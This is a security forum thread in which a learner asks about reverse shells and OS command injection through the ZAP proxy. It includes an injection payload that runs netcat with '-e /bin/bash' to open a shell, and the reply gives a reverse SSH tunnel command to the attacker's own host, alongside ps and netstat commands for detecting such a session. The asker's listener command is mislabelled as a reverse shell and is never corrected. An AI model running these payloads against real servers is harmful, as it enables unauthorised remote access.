# Reverse shell attack and proxy interceptions.. . is there anything worng?

Tags: penetration-test

First I've got a few questions about Reverse shell.

REVERSE SHELL

I'm trying to understand the Reverse shell technique.

My reasoning is as follows (I'd be glad if you could point out any mistake about it)

1) Reverse shell is different (I'd say the opposite) from a normal shell since in this particular case the remote server opens a connection (normal or direct shell implies that the client establishes a connection to the server)

2) Reverse shell can bypass firewall controls since it's basically an outgoing connection. Firewalls are supposed to guard against incoming connections.(Probably this might be questionable)

ATTACK

3) Furthermore, is the following scenario feasible? (I mean, can I inject command through 
a proxy software like ZAP?)

Scenario: A site is vulnerable to user's input data. Users insert data through a text field.

OS: GNU/Linux. Server: Apache/2.2.15 X-Powered-By:PHP/5.3.5

Suppose that through a proxy software (like ZAP) after some checking, you are able to 
note that there's a field which matches the user's input field available through the user interface.

The field is called: `user_val`.

Given that, I can try to inject a simple command separator ";" which practically it is as though  you set: `user_val=;`

Then I notice that there are some files embedded in the web page the application returns.

Wow, the app is vulnerable.

The application is vulnerable, so it's possible to directly interact with the server file system.
Now ...the knotty problem (for me)
4) Is the following command correct? (Using ZAP I try to fire up a reverse shell)

```
netcat -v -e '/bin/bash' -l -p 40552
```

-v (verbose),-e (when a connextion is made it runs the Bash shell), -l (parameter to listen for a connection)
-p (it enables to assign a port to listen on, here port 40552), the port chosen must be free.

5) So using ZAP the injection is the following code correct?:

```
user_val=; netcat -v -e '/bin/bash' -l -p 40552
```

Thanks a lot (I do apologize for the long post).

Answer (score 1):

Yes, reverse ssh may be used to bypass firewall incoming limitations.

But As you have to run such a command on target:

```
ssh -R 2222:localhost:22 myuser@myipaddres
```

This will be visible by sysadmin via a simple

```
ps -C ssh ww
```

This command will print your IP address *and* the login used for remote ssh.

The following command:

```
netstat -tanp |
    sed -ne  '
        s/tcp.*\(127.0.0.[0-9]*\):22[\t ]*\1:.* \([0-9]\+\)\/.*/\2/p
        ' |
        xargs -n1 ps wwho sid --ppid |
        xargs  -n1 ps efwh --sid
```

will print exactly what you'r doing right now.

At all, if you're logged into a honeybot, (real) `.bashrc` contain something like `script` for logging everything you do.

And *last but not least*, Reverse SSH *implie* that target have an acccess to one of your host. So be care that in this host, there are not another opened ssh session.

Comment: So you're actually saying that my reasoning is correct. Of course as you stated there are many way to trace my ip and so on...but my purpose was to know if through a proxy like ZAP I could do some OS command injection

Comment: I don't know ZAP, but the process you describe seem correct...

Comment: @g9999 ZAP is a http "attack" proxy, made for web-apps vuln analysis.... and rev shell needs a NEW connection to your host so ZAP is not involved in your reverse connection setup. It's irrelevant. It may if you point your sploit to connect to a ZAP's port on your machine but it's pointless.